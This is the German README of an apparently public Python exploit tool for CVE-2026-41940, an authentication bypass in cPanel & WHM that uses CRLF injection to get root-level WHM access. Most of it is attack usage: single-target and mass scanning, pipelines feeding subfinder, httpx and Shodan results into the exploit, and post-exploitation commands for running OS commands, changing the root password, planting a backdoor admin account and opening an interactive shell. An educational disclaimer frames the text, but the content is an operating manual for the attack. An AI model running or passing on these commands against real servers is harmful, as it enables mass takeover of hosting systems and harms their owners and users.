Python-PoC, das CVE-2026-41940 ausnutzt, eine Authentifizierungsumgehung in cPanel & WHM, die unauthentifizierten WHM-Zugriff auf Root-Ebene ermöglicht, mit Scanning- und Post-Exploitation-Shell-Befehlen.
⚠ Dieses Tool wurde ausschließlich zu Bildungs- oder Bug-Bounty-Zwecken erstellt. Die unbefugte Nutzung außerhalb kontrollierter Umgebungen ist strengstens untersagt.
Ein Tool zum Ausnutzen von CVE-2026-41940, einer kritischen Authentifizierungsumgehung in cPanel & WHM (CVSS 10.0), die es nicht authentifizierten Angreifern ermöglicht, Root-Level-WHM-Zugriff zu erlangen, indem CRLF-Sequenzen über den Authorization-Header in serverseitige Sitzungsdateien eingeschleust werden — ohne Anmeldedaten.
CVE-2026-41940 wird allgemein durch einen Fehler in der Art und Weise ausgenutzt, wie das System Authentifizierungssitzungen in cPanel/WHM handhabt. Der Angriff beginnt typischerweise mit einer normalen Anfrage an die Login-Oberfläche, bei der die Anwendung vorzeitig eine Sitzung initialisiert, bevor die Benutzeranmeldedaten vollständig validiert werden. Aufgrund der unsachgemäßen Behandlung sitzungsbezogener Eingaben können bestimmte manipulierte oder unerwartete Eingabestrukturen die Art und Weise verändern, wie Sitzungsdaten vom Server gespeichert oder interpretiert werden.
| Version | Anfällig | Gepatcht |
|---|
| 110.x | ≤ 11.110.0.96 | 11.110.0.97 |
| 118.x | ≤ 11.118.0.62 | 11.118.0.63 |
| 126.x | ≤ 11.126.0.53 | 11.126.0.54 |
| 132.x | ≤ 11.132.0.28 | 11.132.0.29 |
| 134.x | ≤ 11.134.0.19 | 11.134.0.20 |
| 136.x | ≤ 11.136.0.4 | 11.136.0.5 |
git clone https://github.com/yasouxken/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows
python cve.py
# MacOS/Linux
python3 cve.py
Das Tool erwartet die Angabe einer Ziel-Domain.
Einzelziel-Modus:
python cve.py -u https://target1.com:2083
Sie können auch aus der Datei target.txt scannen (erstellen Sie diese):
python cve.py -l target.txt -t 50 -o result.json
Verfügbare Befehle:
python cve.py -u https://victim1.com:2083 # Einzelziel-Scan
python cve.py info -u https://victim1.com:2083 # Ruft Systeminformationen ab (Version, Last, Festplattennutzung).
python cve.py host -u https://victim1.com:2083 # Ruft den Hostnamen des Zielservers ab.
# Alle Konten auf dem Server auflisten
python cve.py list -u https://target.com:2087
# OS-Befehl
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"
# Serverinformationen abrufen (Hostname, Festplatte, MySQL-Host)
python cve.py info -u https://target.com:2087
# Root-Passwort ändern
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'
# Interaktive WHM-Shell
python cve.py shell -u https://target.com:2087
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
httpx -silent -ports 2085,2086 -threads 50 | \
python cve.py scan -t 40 -o results.json
# Aus Scope-Liste
cat scope.txt | \
httpx -silent -ports 2085,2086 -threads 100 | \
python cve.py scan -t 30 -o results.json
# Shodan-Ergebnisse
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | \
python cve.py -t 30 -o shodan_results.json
# Mehrere Quellen kombiniert
{ subfinder -d victim.com -silent; cat extra.txt; } | \
httpx -silent -ports 2087 | \
python cve.py -t 20 --action list
Nach einer erfolgreichen Ausführung können Sie eine interaktive WHM-Shell öffnen:
python cve.py shell -u
| Befehl | Beschreibung |
|---|---|
id | Benutzer-ID anzeigen |
hostname | Server-Hostname abrufen |
accounts | Alle Benutzerkonten auflisten |
info | Last, Festplatte, MySQL-Host, Version |
cat <path> | Dateiinhalt lesen |
exec <cmd> | OS-Befehl ausführen |
newadmin <user> <pass> | Backdoor-WHM-Admin erstellen |
passwd <pass> | Root-Passwort ändern |
l [path] | Verzeichnis auflisten |
help | Alle Befehle anzeigen |
exit | Shell-Modus beenden |
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
[-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
[--action ACTION] [--passwd PASS] [--cmd CMD]
[--new-user USER] [--new-domain DOMAIN]
[-o OUTPUT]
Target:
-u, --url URL Einzelne Ziel-URL (z. B. https://host:2087)
-l, --list LIST Datei mit URLs (eine pro Zeile)
--hostname HOSTNAME Kanonischen Host-Header überschreiben (automatisch erkannt)
Scan:
-t, --threads N Parallele Threads (Standard: 10)
--timeout N Anfrage-Timeout in Sekunden (Standard: 15)
--rate-limit N Verzögerung zwischen Zielen (Standard: 0)
--force cPanel-Erkennungsprüfung überspringen
Post-Exploit:
--action ACTION Aktion: list | passwd | cmd | exec | info |
version | shell | adduser
--passwd PASS Neues Root-Passwort (--action passwd)
--cmd CMD OS-Befehl (--action cmd/exec)
--new-user USER Neuer cPanel-Benutzername (--action adduser)
--new-domain DOMAIN Neue cPanel-Domain (--action adduser)
Output:
-o, --output FILE Ergebnisse in JSON-Datei speichern
--no-color ANSI-Farben deaktivieren
⚠ Dieses Tool wurde ausschließlich zu Bildungs- oder Bug-Bounty-Zwecken erstellt. Die unbefugte Nutzung außerhalb kontrollierter Umgebungen ist strengstens untersagt.